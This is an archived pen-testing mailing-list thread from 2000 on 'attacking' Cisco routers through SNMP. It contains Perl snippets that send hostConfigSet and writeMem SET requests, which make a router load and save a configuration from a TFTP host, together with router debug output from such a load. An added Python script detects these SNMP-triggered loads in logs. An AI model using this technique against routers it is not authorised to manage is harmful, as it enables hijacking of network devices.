Penetration Testing mailing list archives
Re: [PEN-TEST] Attacking Cisco using SNMP
From: "Teicher, Mark" <mark.teicher () NETWORKICE COM>
Date: Tue, 28 Nov 2000 19:46:41 +0100
Never quite could get it to work correctly.. But anyways, here are some
code snippets and packet captures to help you out..
You have to remember some of us know very little about SNMP_set and how it
can be utilized to manage large enterprise networks. (biting tongue -:)
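
# Write a SET request to session $nr's write handle, then query ("?") and
# return the reply with its first two characters stripped (0 on error).
sub snmp_raw_set
{
    local($nr,$request) = @_;
    local($w1,$r2,$resp,@ret,@info);
    # Names of the write and read filehandles for session $nr
    $w1 = "wh10" . $nr;
    $r2 = "rh20" . $nr;
    print $w1 ">$request\n";
    # The next line is unneeded, if uncommented will cause wrong error code to be
    # generated.
    # $resp = <$r2>;
    print $w1 "?\n";
    $resp = <$r2>; # should give return code
    if (isError($resp)) { return 0; };
    return substr($resp,2);
}
1;
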
*Mar 1 03:41:54.875 PST: TFTP: Sending read request
*Mar 1 03:41:54.879 PST: UDP: sent src=192.168.55.121(6608), dst=192.168.55.188(69), length=60
*Mar 1 03:41:54.879 PST: IP: s=192.168.55.121 (local), d=192.168.55.188 (Ethernet0), len 60, sending
*Mar 1 03:42:01.543 PST: IP ARP: rcvd req src 192.168.55.188 0800.20b6.07c5, dst 192.168.55.120 Ethernet0
*Mar 1 03:42:01.567 PST: IP ARP: rcvd req src 192.168.55.188 0800.20b6.07c5, dst 192.168.55.120 Ethernet0
*Mar 1 03:42:01.891 PST: SNMP: Response, reqid 2, errstat 5, erridx 1
 lsystem.53.192.168.55.188 = /cisco/ironlung-config
*Mar 1 03:42:01.919 PST: SNMP: Packet sent via UDP to 192.168.55.188
*Mar 1 03:42:01.923 PST: UDP: sent src=192.168.55.121(161), dst=192.168.55.188(33345), length=96
*Mar 1 03:42:01.927 PST: IP: s=192.168.55.121 (local), d=192.168.55.188 (Ethernet0), len 96, sending
*Mar 1 03:42:01.935 PST: IP: s=192.168.55.188 (Ethernet0), d=192.168.55.121 (Ethernet0), len 112, rcvd 3
*Mar 1 03:42:01.939 PST: ICMP: dst (192.168.55.121) port unreachable rcv from 192.168.55.188
*Mar 1 03:42:01.943 PST: SNMP: Packet received via UDP from 192.168.55.188 on Ethernet0
*Mar 1 03:42:01.951 PST: SNMP: Set request, reqid 2, errstat 0, erridx 0
 lsystem.53.192.168.55.188 = /cisco/ironlung-configg
*Mar 1 03:42:01.971 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet request. Loading configuration from 192.168.55.188.
*Mar 1 03:42:01.999 PST: SNMP: Queuing packet to 192.168.55.188
*Mar 1 03:42:01.999 PST: SNMP: V1 Trap, ent ciscoConfigManMIB.2, addr 192.168.55.121, gentrap 6, spectrap 1
 ccmHistoryEventEntry.3.58 = 2
 ccmHistoryEventEntry.4.58 = 6
 ccmHistoryEventEntry.5.58 = 3

Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS56-L), Version 11.2(8), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1997 by cisco Systems, Inc.
Compiled Tue 05-Aug-97 09:07 by ckralik
Image text-base: 0x00001448, data-base: 0x00561104
ROM: System Bootstrap, Version 4.14(9.1), SOFTWARE
ironlung uptime is 2 weeks, 13 hours, 19 minutes
System restarted by power-on
System image file is "c2500-is56-l.112-8.Z", booted via flash
Host configuration file is "/cisco/ironlung-confg", booted via tftp from 192.168.55.188
cisco 2500 (68030) processor (revision D) with 16384K/2048K bytes of memory.
Processor board ID 01560898, with hardware revision 00000000
Bridging software.

Snmpset is an SNMP application that uses the SET Request to set
information on a network entity. One or more fully qualified object
identifiers must be given as arguments on the command line. A type and a
value to set must accompany each object identifier. Each variable name
is given in the format specified in variables.

If the network entity has an error processing the request packet, an error
packet will be returned and a message will be shown, helping to pinpoint
in what way the request was malformed. If there were other variables in
the request, the request will be resent without the bad variable.

sub confActions
{
    my($tftpHost, $pathName, $initHost, $comm) = @_;
    postMessages("confActions($tftpHost, $pathName, $initHost, $comm)", $LOGDBG);
    # Refuse to run when the TFTP host and the router are the same address
    if ($tftpHost eq $initHost) {
        postMessages(">>>> tftpHost = router: $initHost <<<<",$LOGERR);
        return;
    }
    if (!openSNMP($initHost, $comm)) {
        postMessages("$initHost\:", $LOGDBS);
        # hostConfigSet: have the router load $pathName from $tftpHost via TFTP
        if ($ConfFlag == $ConfRead ||
            $ConfFlag == $ConfLoad) {
            $v = "hostConfigSet\[$tftpHost\]=\"$pathName\"";
            $results = &snmp_set($COMMPORT, $v);
            postMessages("\tsnmp_set($COMMPORT, $v)=$results", $LOGDBS);
        }
        # writeMem=1: save the running configuration to non-volatile memory
        if ($ConfFlag == $ConfWrite ||
            $ConfFlag == $ConfLoad) {
            $v = "writeMem=1";
            $results = &snmp_set($COMMPORT, $v);
            postMessages("\tsnmp_set($COMMPORT, $v)=$results", $LOGDBS);
        }
        closeSNMP();
    }
    postMessages("confActions exits", $LOGDBG);
}

At 08:37 AM 11/29/00 +0800, David Taylor wrote:
On Tue, 28 Nov 2000, Fabio Pietrosanti (naif) wrote:
> [snip]
> Does someone ever used snmpset to upload and/or download configuration
> file from a cisco ios 12 with new system mib ?

Fabio,

I haven't had a need to do this (yet), but the Cisco v2 MIBS include quite
a bit of in-line documentation on how this would be done. See the URL
below for the relevant MIB...

ftp://ftp.cisco.com/pub/mibs/v2/CISCO-CONFIG-COPY-MIB.my

Regards,
Dave Taylor
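
Added example, not part of the original messages: a log check for the event in the debug output above, where an SNMP Set on hostConfigSet makes the router load a configuration over TFTP. It scans IOS log text for %SYS-4-SNMP_HOSTCONFIGSET, pairs each hit with the most recent SNMP sender, and marks whether the TFTP server is on an approved list; the sample lines, the addresses and the approved list are constructed assumptions.

```python
import re
from ipaddress import ip_address

# Constructed sample lines, modeled on the IOS log format shown in the post.
# Addresses are documentation ranges, not values from the original capture.
SAMPLE_LOG = """\
*Mar 1 04:10:01.943 PST: SNMP: Packet received via UDP from 192.0.2.50 on Ethernet0
*Mar 1 04:10:01.951 PST: SNMP: Set request, reqid 7, errstat 0, erridx 0
*Mar 1 04:10:01.971 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet request. Loading configuration from 192.0.2.50.
*Mar 1 04:10:01.999 PST: SNMP: V1 Trap, ent ciscoConfigManMIB.2, addr 192.0.2.1, gentrap 6, spectrap 1
*Mar 1 09:30:12.100 PST: SNMP: Packet received via UDP from 198.51.100.10 on Ethernet0
*Mar 1 09:30:12.108 PST: SNMP: Set request, reqid 3, errstat 0, erridx 0
*Mar 1 09:30:12.130 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet request. Loading configuration from 198.51.100.10.
"""

# Assumption: the site keeps a list of approved configuration/TFTP servers.
APPROVED_TFTP = {ip_address("198.51.100.10")}

STAMP = re.compile(r"^\*(\w{3} +\d+ [\d:.]+ \w+): (.*)$")
SNMP_SRC = re.compile(r"SNMP: Packet received via UDP from (\d+\.\d+\.\d+\.\d+)")
CONFIG_LOAD = re.compile(
    r"%SYS-4-SNMP_HOSTCONFIGSET: .*Loading configuration from (\d+\.\d+\.\d+\.\d+)")

def find_snmp_config_loads(log_text, approved=APPROVED_TFTP):
    """Return one finding per SNMP-triggered configuration load in the log."""
    findings, last_snmp_src = [], None
    for line in log_text.splitlines():
        m = STAMP.match(line)
        if not m:
            continue  # varbind continuation lines carry no timestamp
        when, msg = m.groups()
        src = SNMP_SRC.search(msg)
        if src:
            last_snmp_src = src.group(1)  # most recent SNMP sender seen
            continue
        load = CONFIG_LOAD.search(msg)
        if load:
            tftp = load.group(1)
            findings.append({
                "time": when,
                "tftp_server": tftp,
                "snmp_sender": last_snmp_src,
                "approved": ip_address(tftp) in approved,
            })
    return findings

if __name__ == "__main__":
    for f in find_snmp_config_loads(SAMPLE_LOG):
        print("ok   " if f["approved"] else "ALERT", f)
```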
